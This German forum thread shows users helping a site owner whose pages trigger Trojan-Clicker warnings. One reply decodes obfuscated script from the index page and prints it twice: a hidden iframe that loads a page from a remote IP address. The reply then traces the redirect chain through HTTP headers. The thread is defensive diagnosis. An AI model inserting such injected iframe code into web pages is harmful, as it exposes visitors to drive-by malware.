Ich habe momentan ein Problem, beim Klick auf meine Seite -> http://www.RapSpot.de kommen vereinzelt Trojaner Meldungen vor. Dies wird natürlich kein echter Trojaner sein sondern nur irgendeine Stelle die als Trojaner indentifiziert wird. Wie kann ich verhindern das selbiges als trojaner erkannt wird? Wirkt halt recht unseriös wenn man gleich eine Trojaner Warnung bekommt.
Trojaner Warnung
-
vieleicht hat irgendjemand einen Trojaner auf dein Forum gezogen und es ist eine echte Trojaner warnung
-
nutzt du evtl. kaspersky???
-
hab gehört das da kaspersky falschen alarm ausspuckt aber auf die aussage würd ich mich nicht verlassen soll aber ein Trojan-Clicker.JS.Agent.h sein
-
- Offizieller Beitrag
Bei mir kommt auch die Warumg > Trojan-Clicker.JS.Agent.h >
-
Will sich dem vllt. jemand privat annehmen und mal meinen Server auf Trojaner durchsuchen und diese Ausräuchern?
Wär cool wenn das jemand machen würde.MfG w.white
-
pste doch mal den quelltext
-
Klar räum ich deinen Server mal auf , poste doch bitte einmal ip und deinen rootzugriff
-
Poste dein QT und dann sehen wir weiter.
-
Ja genau, der QT
aber der index.html die grade online ist! -
Poste dein QUELLCODE, keine Datei...
am besten die ganze index.html löschen und ein backup draufspielen, welches nicht infiziert ist.. -
Also ich hab mal ein wenig durchgeguckt.
Was macht der JS-Code da?
Der Code in deiner Index ist verschlüsselt.
Entschlüsselt steht folgendes da.Code<SCRIPT> window.status='Done'; document.write('<iframe name=cbc4738199a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273890)+'8f71611b\' width=610 height=449 style=\'display: none\'></iframe>')</SCRIPT>Das heißt also, dass ein iFrame erzeugt wird.
Nun zu der iFrame Zielseite.
Die ist insgesamt ein wenig zufällig, allerdings kommt was ähnliches wie http://77.221.133.188/.if/go.html?1378768f71611b dabei raus.Nun zu dieser Seite
ZitatForbidden
You don't have permission to access /.if/go.html on this server.
Netter Trick, stimmt aber nicht so ganz, denn im Source finden wir folgendes.Zitat<iframe src="http://77.221.133.188/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
Also ab zu der nächstens Seite.
Die leitet leider zu yahoo um, aber ist nicht ganz so unschuldig.
Wenn man sich den HTTP-Code anguckt, den die Server senden erhält man folgendes.ZitatAlles anzeigenhttp://77.221.133.188/.dif/go.php?sid=1
GET /.dif/go.php?sid=1 HTTP/1.1
Host: 77.221.133.188
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
HTTP/1.x 302 Found
Server: nginx/0.5.31
Date: Sat, 22 Dec 2007 13:48:44 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.1.6
Location: http://77.221.133.189/.sp/in.cgi?p=e
Content-Length: 0
Interessant ist an diesem Code nur folgendes
ZitatLocation: http://77.221.133.189/.sp/in.cgi?p=e
Das heisst, dass diese Seite automatisch auf http://77.221.133.189/.sp/in.cgi?p=e umleitet.
Nun näher dazu. Auch diese Seite leitet weiter.ZitatAlles anzeigenHTTP/1.x 302 Found
Server: nginx/0.5.31
Date: Sat, 22 Dec 2007 13:51:21 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=20
Location: http://www.yahoo.com
Content-Length: 204
Interessant ist aber, dass Content-Length nicht 0 ist, also wird auch HTML o.ä. an den Clienten geschickt.
ZitatAlles anzeigen<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>The document has moved here.</p>
</body></html>Also entweder habe ich was übersehen, oder es werden nur 2 iFrames mit dem Ziel Yahoo erstellt
-
Zitat von sudeki05
Poste dein QUELLCODE, keine Datei...
am besten die ganze index.html löschen und ein backup draufspielen, welches nicht infiziert ist..Was glaubst du warum ichs als .txt hochgeladen hab
@ DarkSyranus
Was soll ich jetzt tun?
-
hehe mein kaspersky schlägt bei der text dastei sofort an^^
-
Zitat von w.white
Was glaubst du warum ichs als .txt hochgeladen hab
@ DarkSyranus
Was soll ich jetzt tun?
Eine .txt - DATEI angehängt
Du solltest das ganze schon richtig lesen...Ähm... und wäre wohl angebracht, dann diesen JS-Code zu entfernen, wenn er nicht gewollt ist...
Code<SCRIPT> window.status='Done'; document.write('<iframe name=cbc4738199a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273890)+'8f71611b\' width=610 height=449 style=\'display: none\'></iframe>')</SCRIPT> -
Zitat von sudeki05
Eine .txt - DATEI angehängt
Du solltest das ganze schon richtig lesen...Ähm... und wäre wohl angebracht, dann diesen JS-Code zu entfernen, wenn er nicht gewollt ist...
Code<SCRIPT> window.status='Done'; document.write('<iframe name=cbc4738199a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273890)+'8f71611b\' width=610 height=449 style=\'display: none\'></iframe>')</SCRIPT>ist er nicht aber wenn ich ihn lösche dann kommt ein neuer (anderer) wie es schon 2 mal passiert ist.
-
arbeitest du mit nem WYSIWYG?
Die machen sowas manchmal.
Ansonten würd ich mir ernsthafte sorgen um die server-sicherheit machen.
